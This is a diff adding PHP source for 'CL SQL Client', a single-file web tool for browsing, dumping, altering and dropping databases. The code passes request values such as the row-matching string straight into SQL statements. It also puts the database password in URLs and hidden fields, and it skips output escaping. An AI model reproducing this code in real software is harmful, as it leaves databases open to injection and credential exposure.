+  }
+  fputs ($fp, "#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n# [ SQL Client ]\n# Dumped by SQL Client \n#\n# SQL version: (".get_server_info().")\n# Date: ".date("F j, Y, g:i a")."\n# Dump table: `$tbl`"."\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n");
+ }
+ switch($type) {
+  case "struct":
+   fputs($fp, "\nDROP TABLE IF EXISTS `".$tbl."`;\n");
+   $sql = query( $id, "SHOW CREATE TABLE `".$tbl."`");
+   $row = sql_fetch_row($sql);
+   fputs($fp, $row[1].";\n\n");
+  break;
+  case "data":
+   $sql = query( $id, "SELECT * FROM `".$tbl."`" );
+   if (sql_num_rows($sql) > 0) {
+    while ($row = sql_fetch_assoc($sql)) {
+     $keys = implode("`, `", array_keys($row));
+     $values = array_values($row);
+     foreach($values as $key=>$value) {
+      $values[$key] = addslashes($value);
+     }
+     $values = implode("', '", $values);
+     $sql_dump = "INSERT INTO `$tbl` (`".$keys."`) VALUES ('".$values."');\n";
+     fputs($fp, $sql_dump);
+    }
+   } else {
+    fputs($fp, "# TABLE `$tbl` IS AMPTY\n\n");
+   }
+  break;
+  case "full":
+   fputs($fp, "\nDROP TABLE IF EXISTS `".$tbl."`;\n");
+   $sql = query( $id, "SHOW CREATE TABLE `".$tbl."`");
+   $row = sql_fetch_row($sql);
+   fputs($fp, $row[1].";<BR><BR>");
+   $sql = query( $id, "SELECT * FROM `$tbl`" );
+   if (sql_num_rows($sql) > 0) {
+    while ($row = sql_fetch_assoc($sql)) {
+     $keys = implode("`, `", array_keys($row));
+     $values = array_values($row);
+     foreach($values as $key=>$value) {
+      $values[$key] = addslashes($value);
+     }
+     $values = implode("', '", $values);
+     $sql_dump = "INSERT INTO `$tbl` (`".$keys."`) VALUES ('".$values."');\n";
+     fputs($fp, $sql_dump);
+    }
+   } else {
+    fputs($fp, "# TABLE `$tbl` IS AMPTY\n\n");
+   }
+   break;
+   default:
+    return "\n<BR><BR><B>Backup Table</B><BR><table><tr> <td><a href=\"".$baseurl."&act=10&dump=tbl&tbl=".$tbl."&type=full\">Full backup (Strukture and Data)</a></td></tr><tr> <td><a href=\"".$baseurl."&act=10&dump=tbl&tbl=".$tbl."&type=struct\">Only Structure</a></td></tr><tr> <td><a href=\"".$baseurl."&act=10&dump=tbl&tbl=".$tbl."&type=data\">Only data info</a></td></tr></table>";
+   break;
+ }
+ fclose($fp);
+ return "\n<BR><BR><font color=\"green\">Dumped! Dump has been writed to <a href=\"".$baseurl."&act=11&file=".urlencode(realpath($file))."\">".htmlspecialchars(realpath($file))."</a> (".formatsize(@filesize($file)).")</font><BR><BR>\n<img border=\"0\" src=\"".basename(__FILE__)."?image=download\">&nbsp;<B>".$lang[$language.'_text26']."</B>&nbsp;<a href=\"".$baseurl."&act=12&file=".urlencode($file)."\">Click</a>";
+}
+
+// Check Variables
+if(isset($dbtype)) {
+ if($server) {
+  $server = AlphanumericalClean($server);
+  $baseurl .= "&server=".$server;
+ }
+ if($port) {
+  $port = intval($port);
+  $baseurl .= "&port=".AlphanumericalClean($port);
+ }
+ if(empty($login)) {
+  $login = 'nobody';
+ }
+ $login = AlphanumericalClean($login);
+ $baseurl .= "&login=".$login;
+
+ if($passwd) {
+  $password = AlphanumericalClean($password);
+  $baseurl .= "&password=".$password;
+ } else {
+  $baseurl .= "&password=";
+ }
+ if($db) {
+  $db = AlphanumericalClean($db);
+  $baseurl .= "&db=".$db;
+ }
+ $baseurl .= "&dbtype=".$dbtype;
+ // Return identificator
+ $id = sql_connect($server.":".$port, $login, $password, $db) or die("ERROR! Can't connect to SQL server");
+} else {
+ die("<form method=\"post\">\n<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" height=\"100%\">\n<tr height=\"115\">\n <td height=\"115\" align=\"center\" valign=\"middle\"><center><h1>CL SQL Client Login</h1>\n<table border=\"0\" cellpadding=\"5\" cellspacing=\"3\">\n<tr>\n <td>Username:</td>\n <td><input type=\"text\" name=\"login\" value=\"\" size=\"24\"></td>\n</tr>\n<tr>\n <td>Password:</td>\n <td><input type=\"password\" name=\"password\" size=\"24\"></td>\n</tr>\n<tr>\n <td>Server IP:</td>\n <td><input type=\"text\" name=\"server\" value=\"localhost\" size=\"24\"></td>\n</tr>\n<tr>\n <td>Server Port:</td>\n <td><input type=\"text\" name=\"port\" value=\"3306\" size=\"24\"></td>\n</tr>\n<tr>\n <td>SQL Server (type):</td>\n <td><select name=\"dbtype\"><option value=\"mysql\">mySQL</option><option value=\"msql\">mSQL</option><option value=\"postgres\">PostgresSQL</option><option value=\"Interbase\">Interbase</option><option value=\"Sybase\">Sybase</option><option value=\"Sybase\">ODBC</option></select></td>\n</tr>\n<tr>\n <td colspan=\"2\" align=\"right\" valign=\"middle\"><input type=\"submit\" value=\"Login\"></td>\n</tr>\n</table>\n</center></td>\n</tr>\n</table>\n</form>");
+}
+
+
+//--------------------------------
+//  HTML header
+//--------------------------------
+//
+echo "<html>\n<head>\n<title>[  CL SQL Client  ]</title>\n<meta http-equiv=Content-Type Pragma: no-cache; content=\"text/html; charset=windows-1251\">\n<style>\n* {\n margin: 0;\n padding: 0;\n}\nbody {\n margin-top: 1px;\n margin-right: 1px;\n margin-bottom: 1px;\n margin-left: 1px;\n background-color: #CCCCCC;\n font-family: Verdana, Geneva, Arial, Helvetica, sans-serif;\n font-size:12px;\n}
+table {\n padding: 0em;\n font-size: 0.85em;\n background-color: #D7D8DA;\n}\ntr {\n font-size:12px;\n BORDER-RIGHT: #aaaaaa 1px solid;\n BORDER-TOP: #eeeeee 1px solid;\n BORDER-LEFT: #eeeeee 1px solid;\n BORDER-BOTTOM: #aaaaaa 1px solid;\n}\ntd {\n font-size:12px;\n BORDER-RIGHT: #aaaaaa 1px solid;\n BORDER-TOP: #eeeeee 1px solid;\n BORDER-LEFT: #eeeeee 1px solid;\n BORDER-BOTTOM: #aaaaaa 1px solid;\n}\na {\n color: #003366;\n text-decoration: none;\n}\na:hover {\n color: #003366;\n}\na img {\n border: none;\n}\ninput,textarea,select {\n font-family: Verdana, Tahoma, Helvetica, Arial, sans-serif;\n font-size: 1em;\n}\n</style>\n<script language=\"javascript\">function confirm_function(url) {\n if(confirm('Âû óâåðåíû?')){\n  window.location = ''+url;\n }\n}</script></head>\n<body>\n".quicklaunch()."\n<table border=\"0\" width=\"960\">\n<tr align=\"center\" valign=\"top\">\n <td width=\"200\">".db_list($id)."</td>\n<td width=\"760\">\n<center>\n";
+
+// Switching $act
+if($act == '00') {
+ $sql = query($id, "SHOW VARIABLES");
+ echo "\n<img border=\"0\" src=\"".basename(__FILE__)."?image=host\">&nbsp;<B>".$lang[$language.'_text4']."</B>\n<BR>";
+ echo "\n<table border=\"0\" width=\"700\">\n<tr>\n <td><B>Name</B></td>\n <td><B>Value</B></td>\n</tr>";
+ while ($row = sql_fetch_assoc($sql)) {
+  echo "\n<tr onmouseover=this.style.backgroundColor=\"#CCCCCC\" onmouseout=this.style.backgroundColor=\"\">\n <td><B>".$row["Variable_name"]."</B></td>\n <td>".$row["Value"]."</td>\n</tr>";
+ }
+ echo "\n</table>\n";
+ @sql_free_result($sql);
+ unset($sql);
+} elseif($act == '01') {
+ $sql = query($id, "SHOW STATUS");
+ echo "\n<img border=\"0\" src=\"".basename(__FILE__)."?image=host\">&nbsp;<B>".$lang[$language.'_text3']."</B>\n<BR>";
+ echo "\n<table border=\"0\" width=\"700\">\n<tr>\n <td><B>Name</B></td>\n <td><B>Value</B></td>\n</tr>";
+ while ($row = sql_fetch_assoc($sql)) {
+  echo "\n<tr onmouseover=this.style.backgroundColor=\"#CCCCCC\" onmouseout=this.style.backgroundColor=\"\">\n <td><B>".$row["Variable_name"]."</B></td>\n <td>".$row["Value"]."</td>\n</tr>";
+ }
+ echo "\n</table>\n";
+ @sql_free_result($sql);
+ unset($sql);
+} elseif($act == '02') {
+ $quicklaunch = array
+   (
+    array($lang[$language.'_text15'],$baseurl."&act=07"),
+    array($lang[$language.'_text12'],$baseurl."&act=10&dump=db&db=".$db),
+    array($lang[$language.'_text13'],"javascript: confirm_function('".$baseurl."&act=03&db=".$db."');"),
+   );
+ echo "\n[ <img border=\"0\" src=\"".basename(__FILE__)."?image=browse_db\" align=\"absmiddle\"> ".$lang[$language.'_text7'].": <B>".AlphanumericalClean($db)."</B> ]<BR><BR>";
+ if (count($quicklaunch) > 0) {
+  foreach($quicklaunch as $item) {
+   echo "[ <a href=\"".$item[1]."\"><B>".$item[0]."</B></a> ] ";
+  }
+ }
+ if (!sql_num_rows(query($id, "SHOW TABLES FROM `".AlphanumericalClean($db)."`"))) { // [-]
+  if(sql_error()) {
+   echo "\n<BR><BR>".sql_error()."<BR>";
+  } else {
+   echo "\n<BR><BR><B>Database ".AlphanumericalClean($db)." is empty</B><BR>";
+  }
+ } else {
+  $sql = query($id, "SHOW TABLE STATUS FROM `".$db."`");
+  echo "\n<BR><BR><table border=\"0\" width=\"700\">\n<tr align=\"center\">\n <td colspan=\"2\">Table</td>\n <td>Rows</td>\n <td>Type</td>\n <td>Created</td>\n <td>Modified</td>\n <td>Size</td>\n <td colspan=\"3\">Quick Action</td>\n</tr>";
+  while ($row = @sql_fetch_assoc($sql)) {
+   echo "\n<tr onmouseover=this.style.backgroundColor=\"#CCCCCC\" onmouseout=this.style.backgroundColor=\"\" align=\"center\" width=\"700\">\n <td><img border=\"0\" src=\"".basename(__FILE__)."?image=tbl\" align=\"absmiddle\"></td>\n <td><a href=\"".$baseurl."&act=05&tbl=".urlencode($row["Name"])."\">".$row["Name"]."</a></td>\n <td>".$row["Rows"]."</td> <td>".$row["Type"]."</td>\n <td>".$row["Create_time"]."</td>\n <td>".$row["Update_time"]."</td>\n <td>".formatsize($row["Avg_row_length"])."</td>\n <td><a href=\"".$baseurl."&act=10&dump=tbl&tbl=".$row["Name"]."\" title=\"Backup Table ".$row["Name"]."\"><img src=\"".basename(__FILE__)."?image=save\" align=\"absmiddle\"></a></td>\n <td><a href=\"javascript: confirm_function('".$baseurl."&act=09&query=".urlencode("DROP TABLE `".$row["Name"]."`")."');\" title=\"DROP Table ".$row["Name"]."\"><img src=\"".basename(__FILE__)."?image=drop\" align=\"absmiddle\"></a></td>\n <td><a href=\"javascript: confirm_function('".$baseurl."&act=09&query=".urlencode("DELETE FROM `".$row["Name"]."`")."');\" title=\"ClearTable ".$row["Name"]."\"><img src=\"".basename(__FILE__)."?image=clear\" align=\"absmiddle\"></a></td>\n</tr>";
+  }
+  echo "\n</table>\n";
+  @sql_free_result($sql);
+  unset($sql);
+ }
+} elseif($act == '03') {
+ $sql = query($id, "DROP DATABASE `".AlphanumericalClean($db)."`");
+ if($sql) {
+  echo "\n<BR><BR><font color=\"green\">Database <B>".AlphanumericalClean($db)."</B> deleted successfully</font>";
+ }
+ @sql_free_result($sql);
+ unset($sql);
+} elseif($act == '04') {
+ if(!isset($new_db)) {
+  echo "\n<BR><BR><B>".$lang[$language.'_text9']."</B><BR>\n<form method=\"post\" action=\"".basename(__FILE__)."\">\n<input type=\"hidden\" name=\"login\" value=\"".$login."\">\n<input type=\"hidden\" name=\"password\" value=\"".$password."\">\n<input type=\"hidden\" name=\"server\" value=\"".$server ."\">\n<input type=\"hidden\" name=\"port\" value=\"".$port ."\">\n<input type=\"hidden\" name=\"dbtype\" value=\"".$dbtype."\">\n<input type=\"hidden\" name=\"act\" value=\"04\">\n<input type=\"hidden\" name=\"db\" value=\"".$db."\">".$lang[$language.'_text7'].": <input type=\"text\" name=\"new_db\" value=\"\" maxlength=\"10\">\n<input type=\"submit\" value=\"create\">\n</form>";
+ } else {
+  $sql = query($id, "CREATE DATABASE `".AlphanumericalClean($new_db)."`");
+  if($sql) {
+   echo "\n<BR><BR><font color=\"green\">Database <B>".AlphanumericalClean($new_db)."</B> created successfully</font>";
+  }
+  @sql_free_result($sql);
+  unset($sql);
+ }
+} elseif($act == '05') {
+ echo "\n[ <img border=\"0\" src=\"".basename(__FILE__)."?image=tbl\" align=\"center\"> ".$lang[$language.'_text14'].": <B>".AlphanumericalClean($tbl)."</B> ] [ <img border=\"0\" src=\"".basename(__FILE__)."?image=browse_db\" align=\"center\"> ".$lang[$language.'_text7'].": <B><a href=\"".$baseurl."&act=02\">".AlphanumericalClean($db)."</a></B> ]<BR><BR>";
+ $quicklaunch = array
+   (
+    array($lang[$language.'_text16'],$baseurl."&act=05&tbl=".$tbl),
+    array($lang[$language.'_text17'],$baseurl."&act=05&tbl=".$tbl."&CODE=00"),
+    array($lang[$language.'_text18'],$baseurl."&act=05&tbl=".$tbl."&CODE=01"),
+    array($lang[$language.'_text19'],$baseurl."&act=05&tbl=".$tbl."&CODE=04"),
+    array($lang[$language.'_text20'],"javascript: confirm_function('".$baseurl."&act=05&tbl=".$tbl."&CODE=02');"),
+    array($lang[$language.'_text21'],$baseurl."&act=10&dump=tbl&tbl=".$tbl),
+   );
+ if (count($quicklaunch) > 0) {
+  foreach($quicklaunch as $item) {
+   echo "[ <a href=\"".$item[1]."\"><B>".$item[0]."</B></a> ] ";
+  };
+ }
+ if($CODE == '00' && isset($tbl)) {
+  $sql = query($id, "SELECT * FROM `".AlphanumericalClean($tbl)."`");
+  if(!sql_num_rows($sql)) {
+   echo "\n<BR><BR>Table is ampty";
+  } else {
+   echo "\n<BR><BR><table align=\"center\" width=\"700\">\n<tr align=\"center\">";
+   for( $i=0; $i < sql_num_fields($sql); $i++ ) {
+    echo "\n <td><B>".sql_field_name($sql,$i)."</B></td>";
+   }
+   echo "\n <td colspan=\"2\"><B>Action</B></td>\n</tr>";
+   while ($row = @sql_fetch_assoc($sql)) {
+    $edit = '';
+    echo "\n<tr onmouseover=this.style.backgroundColor=\"#CCCCCC\" onmouseout=this.style.backgroundColor=\"\" align=\"center\">";
+    foreach ($row as $key=>$value) {
+     echo "\n <td>".substr(htmlspecialchars($value), 0, 64)."</td>";
+    }
+    foreach ($row as $key=>$value) {
+     $edit .= urlencode("`$key`='$value' AND ");
+    }
+    $pm = substr($edit,"",-5);
+    echo "\n <td><a href=\"".$baseurl."&act=05&tbl=".$tbl."&CODE=03&pm=".$pm."\" title=\"Edit row\"><img border=\"0\" src=\"".basename(__FILE__)."?image=edit\" align=\"center\"></a></td>\n <td><a href=\"".$baseurl."&act=09&query=DELETE+FROM+".$tbl."+WHERE+".$pm."\" title=\"Delete row\"><img border=\"0\" src=\"".basename(__FILE__)."?image=drop\" align=\"center\"></a></td>\n</tr>";
+    unset($edit);
+   }
+   echo "\n</table>\n";
+  }
+  @sql_free_result($sql);
+  unset($sql);
+ } elseif($CODE == '01') {
+  if((isset($values)) && (count($values))) {
+   foreach($values as $key=>$value) {
+    $fields .= "`".$key."`, ";
+    $val .= '"'.$value.'", ';
+   }
+   $sql = query($id, "INSERT INTO `".$tbl."` ( ".substr($fields,"",-2)." ) VALUES ( ".substr($val,"",-2)." ); ");
+   if($sql) {
+    echo "\n<BR><BR><font color=\"green\">New row successfull inserted into table  [ <B>".AlphanumericalClean($tbl)."</B> ]<BR>(Last inserted record has id ".mysql_insert_id($id).")</font><BR>";
+   }
+   @sql_free_result($sql);
+   unset($sql);
+  } else {
+   $sql = query($id, "DESC `".$tbl."`");
+   echo "\n<BR><BR>Insert row into table  [ <img border=\"0\" src=\"".basename(__FILE__)."?image=tbl\" align=\"center\"> <B>".AlphanumericalClean($tbl)."</B> ]<BR>\n<form method=\"post\" action=\"".basename(__FILE__)."\">\n<input type=\"hidden\" name=\"login\" value=\"".$login."\">\n<input type=\"hidden\" name=\"password\" value=\"".$password."\">\n<input type=\"hidden\" name=\"server\" value=\"".$server ."\">\n<input type=\"hidden\" name=\"port\" value=\"".$port ."\">\n<input type=\"hidden\" name=\"dbtype\" value=\"".$dbtype."\">\n<input type=\"hidden\" name=\"db\" value=\"".$db."\">\n<input type=\"hidden\" name=\"act\" value=\"05\">\n<input type=\"hidden\" name=\"CODE\" value=\"01\">\n<input type=\"hidden\" name=\"tbl\" value=\"".$tbl."\">\n<table align=\"center\" border=\"0\" width=\"700\">\n<tr>\n <td>Field</td>\n <td>Type</td>\n <td>Value</td>\n</tr>";
+   while ($row = sql_fetch_assoc($sql)) {
+    $tmp = $row["Type"]." ".$row["Extra"];
+    echo "\n<tr onmouseover=this.style.backgroundColor=\"#CCCCCC\" onmouseout=this.style.backgroundColor=\"\"> <td>".$row["Field"]."</td> <td>".$tmp."</td> <td align=\"center\"><input type=\"text\" name=\"values[".$row["Field"]."]\" value=\"\"></td></tr>";
+   }
+   echo "\n</table>\n<input type=\"submit\" value=\"Insert\">\n</form>";
+   @sql_free_result($sql);
+   unset($sql);
+  }
+ } elseif($CODE == '02') {
+  $sql = query($id, "DROP TABLE `".AlphanumericalClean($tbl)."`");
+  if($sql) {
+   echo "\n<BR><BR><font color=\"green\">Table <B>".AlphanumericalClean($tbl)."</B> deleted successfully</font>";
+  }
+  @sql_free_result($sql);
+  unset($sql);
+ } elseif($CODE == '03') {
+  if(count($values)) {
+   foreach($values as $key=>$value) {
+    $edit .= "`".$key."` = '".$value."', ";
+   }
+   $sql = query($id, "UPDATE `".AlphanumericalClean($tbl)."` SET ".substr($edit,"",-2)." WHERE ".stripslashes(urldecode($pm))."");
+   if($sql) {
+    echo "\n<BR><BR><font color=\"green\">Successfull saved</font><BR>";
+   }
+   @sql_free_result($sql);
+   unset($sql);
+  } else {
+   $sql = query($id, "SELECT * FROM `".AlphanumericalClean($tbl)."` WHERE $pm LIMIT 1");
+   echo "\n<BR><BR>Insert row into table  [ <B>".AlphanumericalClean($tbl)."</B> ]<BR>\n<form method=\"post\" action=\"".basename(__FILE__)."\">\n<input type=\"hidden\" name=\"login\" value=\"".$login."\">\n<input type=\"hidden\" name=\"password\" value=\"".$password."\">\n<input type=\"hidden\" name=\"server\" value=\"".$server ."\">\n<input type=\"hidden\" name=\"port\" value=\"".$port ."\">\n<input type=\"hidden\" name=\"dbtype\" value=\"".$dbtype."\">\n<input type=\"hidden\" name=\"db\" value=\"".$db."\">\n<input type=\"hidden\" name=\"act\" value=\"05\"><input type=\"hidden\" name=\"pm\" value=\"".$pm."\">\n<input type=\"hidden\" name=\"CODE\" value=\"03\">\n<input type=\"hidden\" name=\"tbl\" value=\"".$tbl."\">\n<table align=\"center\" border=\"0\" width=\"700\">\n<tr>\n <td>Field</td>\n <td>Value</td>\n</tr>";
+   while ($row = sql_fetch_assoc($sql)) {
+    foreach($row as $key=> $value) {
+     echo "\n<tr onmouseover=this.style.backgroundColor=\"#CCCCCC\" onmouseout=this.style.backgroundColor=\"\"> <td>".$key."</td> <td align=\"center\"><input type=\"text\" name=\"values[".$key."]\" value=\"".$value."\"></td></tr>";
+    }
+   }
+   echo "\n</table>\n<input type=\"submit\" value=\"Save\">\n</form>\n";
+   @sql_free_result($sql);
+   unset($sql);
+  }
+ } elseif($CODE == '04') {
+  if(count($values) && isset($values)) {
+   foreach($values as $key=>$value) {
+    $edit .= " MODIFY `".$key."` ".$value.", ";
+   }
+   $sql = query($id, "ALTER TABLE `".AlphanumericalClean($tbl)."` ".substr(stripslashes($edit),"",-2)."; ");
+   if($sql) {
+    echo "\n<BR><BR><font color=\"green\">Successfull saved</font><BR>";
+   }
+   @sql_free_result($sql);
+   unset($sql);
+  } else {
+   $sql = query($id, "DESC `".AlphanumericalClean($tbl)."`");
+   echo "\n<BR><BR>Alter table  [ <B>".AlphanumericalClean($tbl)."</B> ]<form method=\"post\" action=\"".basename(__FILE__)."\"><input type=\"hidden\" name=\"login\" value=\"".$login."\"><input type=\"hidden\" name=\"password\" value=\"".$password."\"><input type=\"hidden\" name=\"server\" value=\"".$server ."\"><input type=\"hidden\" name=\"port\" value=\"".$port ."\"><input type=\"hidden\" name=\"dbtype\" value=\"".$dbtype."\"><input type=\"hidden\" name=\"db\" value=\"".$db."\"><input type=\"hidden\" name=\"act\" value=\"05\"><input type=\"hidden\" name=\"CODE\" value=\"04\"><input type=\"hidden\" name=\"tbl\" value=\"".$tbl."\">\n<BR><table align=\"center\" border=\"0\" width=\"700\">\n<tr>\n <td>Field</td>\n <td>Type</td>\n</tr>";
+   while ($row = sql_fetch_assoc($sql)) {
+    $tmp = $row["Type"]." ".$row["Extra"];
+    echo "\n<tr>\n <td>".$row["Field"]."</td>\n <td><input type=\"text\" name=\"values[".$row["Field"]."]\" value=\"".$tmp."\"></td>\n</tr>";
+    unset($tmp);
+   }
+   echo "\n</table>\n<input type=\"submit\" value=\"Save\">\n";
+  }
+ } else {
+  $quicklaunch = array(
+   array("Add new column",$baseurl."&act=05&tbl=".$tbl),
+  );
+  $sql = query($id, "DESC `".AlphanumericalClean($tbl)."`");
+  if(!sql_num_fields($sql)) {
+   echo "\n<BR><BR>Table is ampty";
+  } else {
+   echo "\n<BR><BR>Ñòðóêòóðà òàáëèöû [ <B>".AlphanumericalClean($tbl)."</B> ]\n<BR>\n<table align=\"center\" border=\"0\" width=\"700\">\n<tr align=\"center\">\n <td>Field</td>\n <td>Type</td>\n <td>NULL</td>\n <td>Key</td>\n <td>Default</td>\n <td>Extra</td>\n <td colspan=\"5\">Action</td>\n</tr>";
+   while ($row = sql_fetch_assoc($sql)) {
+    echo "\n<tr onmouseover=this.style.backgroundColor=\"#CCCCCC\" onmouseout=this.style.backgroundColor=\"\">";
+    foreach ($row as $field =>$value) {
+     echo "\n <td>".$value."</td>";
+    }
+    echo "\n <td><a href=\"".$baseurl."&act=09&query=".urlencode("ALTER TABLE `".$tbl."` ADD INDEX ( ".$row["Field"].")")."\" title=\"ADD INDEX KEY\"><img border=\"0\" src=\"".basename(__FILE__)."?image=index\" align=\"center\"></a></td> <td><a href=\"".$baseurl."&act=09&query=".urlencode("ALTER TABLE `".$tbl."` DROP INDEX ".$row["Field"])."\" title=\"DROP INDEX ".$row["Field"]."\"><img border=\"0\" src=\"".basename(__FILE__)."?image=empty\" align=\"center\"></a></td> <td><a href=\"".$baseurl."&act=09&query=".urlencode("ALTER TABLE `".$tbl."` ADD PRIMARY KEY ( ".$row["Field"].")")."\" title=\"ADD PRIMARY KEY\"><img border=\"0\" src=\"".basename(__FILE__)."?image=primary\" align=\"center\"></a></td> <td><a href=\"".$baseurl."&act=09&query=".urlencode("ALTER TABLE `".$tbl."` DROP PRIMARY KEY ")."\" title=\" DROP PRIMARY KEY column ".$row["Field"]."\"><img border=\"0\" src=\"".basename(__FILE__)."?image=empty\" align=\"center\"></a></td> <td><a href=\"javascript: confirm_function('".$baseurl."&act=09&query=".urlencode("ALTER TABLE `".$tbl."` DROP COLUMN ".$row["Field"])."');\" title=\" Delete column ".$row["Field"]."\"><img border=\"0\" src=\"".basename(__FILE__)."?image=drop\" align=\"center\"></a></td></tr>";
+   }
+   echo "\n</table>";
+  }
+  // if (count($quicklaunch) > 0) {foreach($quicklaunch as $item) {$str .= "[ <a href=\"".$item[1]."\"><B>".$item[0]."</B></a> ] ";};} [-]
+  @sql_free_result($sql);
+  unset($sql);
+ }
+} elseif($act == '06') {
+ $sql = query($id, "DROP TABLE `".AlphanumericalClean($tbl)."`");
+ if($sql) {
+  echo "\n<BR><BR><font color=\"green\">Table <B>".AlphanumericalClean($tbl)."</B> deleted successfully</font>";
+ }
+ @sql_free_result($sql);
+ unset($sql);
+} elseif($act == '07') {
+ if(!isset($new_tbl)) {
+  echo "\n<BR><BR><B>Create new Table</B><BR>\n<form method=\"post\" action=\"".basename(__FILE__)."\">\n<input type=\"hidden\" name=\"login\" value=\"".$login."\">\n<input type=\"hidden\" name=\"password\" value=\"".$password."\">\n<input type=\"hidden\" name=\"server\" value=\"".$server ."\">\n<input type=\"hidden\" name=\"port\" value=\"".$port ."\">\n<input type=\"hidden\" name=\"dbtype\" value=\"".$dbtype."\">\n<input type=\"hidden\" name=\"act\" value=\"07\">\n<input type=\"hidden\" name=\"db\" value=\"".$db."\">\nTable name: <input type=\"text\" name=\"new_tbl\" value=\"\" maxlength=\"10\">\n<BR>Table rows: <input type=\"text\" name=\"rows\" value=\"\" maxlength=\"10\">\n<BR><input type=\"submit\" value=\"create\">\n</form>";
+ } else {
+  if(!isset($field_name)) {
+   if(!isset($rows)) {
+    echo "Ââåäèòå êîë-âî ñòðîê";
+    exit;
+   }
+   echo "\n<BR><BR><B>Create new Table</B><BR>\n<form method=\"post\" action=\"".basename(__FILE__)."\">\n<input type=\"hidden\" name=\"login\" value=\"".$login."\">\n<input type=\"hidden\" name=\"password\" value=\"".$password."\">\n<input type=\"hidden\" name=\"server\" value=\"".$server ."\">\n<input type=\"hidden\" name=\"port\" value=\"".$port ."\">\n<input type=\"hidden\" name=\"dbtype\" value=\"".$dbtype."\">\n<input type=\"hidden\" name=\"act\" value=\"07\">\n<input type=\"hidden\" name=\"db\" value=\"".$db."\">\n<input type=\"hidden\" name=\"new_tbl\" value=\"".$new_tbl."\">\n<input type=\"hidden\" name=\"rows\" value=\"".$rows."\">\n<table>\n<tr>\n <td><B>Field</B></td>\n <td><B>Type</B></td>\n <td><B>Length</B></td>\n <td><B>Atributes</B></td>\n <td><B>NULL</B></td>\n <td><B>Defailt</B></td>\n <td><B>DOP</B></td>\n <td><B>KEYS</B></td>\n</tr>";
+   for($i=0; $i < $rows; $i++) {
+    echo "\n<tr align=\"center\" bgcolor=\"#DDDDDD\">\n <td><input type=\"text\" name=\"field_name[]\" size=\"10\" value=\"\"></td>\n <td><select name=\"field_type[]\" width=\"3\"><option value=\"VARCHAR\">VARCHAR</option><option value=\"TINYINT\">TINYINT</option> <option value=\"TEXT\">TEXT</option><option value=\"DATE\">DATE</option><option value=\"SMALLINT\">SMALLINT</option><option value=\"MEDIUMINT\">MEDIUMINT</option><option value=\"INT\">INT</option><option value=\"BIGINT\">BIGINT</option><option value=\"FLOAT\">FLOAT</option><option value=\"DOUBLE\">DOUBLE</option><option value=\"DECIMAL\">DECIMAL</option> <option value=\"DATETIME\">DATETIME</option><option value=\"TIMESTAMP\">TIMESTAMP</option><option value=\"TIME\">TIME</option><option value=\"YEAR\">YEAR</option><option value=\"CHAR\">CHAR</option><option value=\"TINYBLOB\">TINYBLOB</option><option value=\"TINYTEXT\">TINYTEXT</option><option value=\"BLOB\">BLOB</option><option value=\"MEDIUMBLOB\">MEDIUMBLOB</option><option value=\"MEDIUMTEXT\">MEDIUMTEXT</option><option value=\"LONGBLOB\">LONGBLOB</option><option value=\"LONGTEXT\">LONGTEXT</option><option value=\"ENUM\">ENUM</option><option value=\"SET\">SET</option></select></td> <td><input type=\"text\" name=\"field_length[]\" size=\"6\" value=\"\"></td>\n <td><select name=\"field_attribute[]\"><option value=\"\" selected=\"selected\"></option><option value=\"BINARY\">BINARY</option><option value=\"UNSIGNED\">UNSIGNED</option><option value=\"UNSIGNED ZEROFILL\">UNS-D ZEROFILL</option></select></td> <td><select name=\"field_null[]\"><option value=\"NOT NULL\">not null</option><option value=\"\">null</option></select></td>\n <td><input type=\"text\" name=\"field_default[]\" size=\"14\" value=\"\"></td>\n <td><select name=\"field_extra[]\"><option value=\"\"></option><option value=\"AUTO_INCREMENT\">auto_increment</option></select></td>\n <td align=\"center\"><select name=\"field_key[]\"><option value=\"\"></option><option value=\"PRIMARY\">PRIMARY</option><option value=\"INDEX\">INDEX</option><option value=\"UNIQUE\">UNIQUE</option></select></td>\n</tr>";
+   }
+   echo "\n</table>\n<BR><input type=\"submit\" value=\"create\">\n</form>";
+  } else {
+   for($q=0; $q < count($field_name); $q++) {
+    if($field_name[$q]) {
+     $value .= " `".$field_name[$q]."`";
+    }
+    if($field_length[$q]) {
+     $field_length[$q] = "( ".$field_length[$q] ." )";
+    }
+    if($field_type[$q]) {
+     $value .= " ".$field_type[$q].$field_length[$q];
+    }
+    if($field_attribute[$q]) {
+     $value .= " ".htmlspecialchars($field_attribute[$q]);
+    }
+    if($field_null[$q]) {
+     $value .= " ".htmlspecialchars($field_null[$q]);
+    }
+    if($field_default[$q]) {
+     $value .= " DEFAULT '".htmlspecialchars($field_default[$q])."'" ;
+    }
+    $value .= ", ";
+   }
+   $sql = query($id, "CREATE TABLE `".AlphanumericalClean($new_tbl)."` ( ".$value." )");
+   if($sql) {
+    echo "\n<BR><BR><font color=\"green\">Table ".AlphanumericalClean($new_tbl)." created successfully</font>";
+   } else {
+    echo "\n<BR><BR><font color=\"red\">Table ".AlphanumericalClean($new_tbl)." not created</font>";
+   }
+   @sql_free_result($sql);
+   unset($sql);
+  }
+ }
+} elseif($act == '08') {
+  if(isset($pid)) {
+   if(!is_numeric(AlphanumericalClean($pid))) {
+    echo "\n<B>Warning!!!</B> Bad proccess ID format";
+   }
+   $sql = query($id, "KILL ".AlphanumericalClean($pid));
+   if($sql) {
+    echo "<BR><head><META HTTP-EQUIV='Refresh' CONTENT='2;url=javascript:history.go(-1)'></head><BR><BR><font color=\"green\"><B>Process #: ".intval($pid)." successfull killed</B></font>";
+   }
+   @sql_free_result($sql);
+   unset($sql);
+  }
+  $sql = sql_list_processes($id);
+  echo "<B>".$lang[$language.'_text5']."</B><BR>";
+  echo "\n<table border=\"0\" width=\"700\">\n<tr align=\"center\">";
+  for($i=0; $i < sql_num_fields($sql); $i++) {
+   echo "\n <td>".sql_field_name($sql,$i)."</td>";
+  }
+  echo "\n <td>Action</td>\n</tr>";
+  while($row = sql_fetch_assoc($sql) ) {
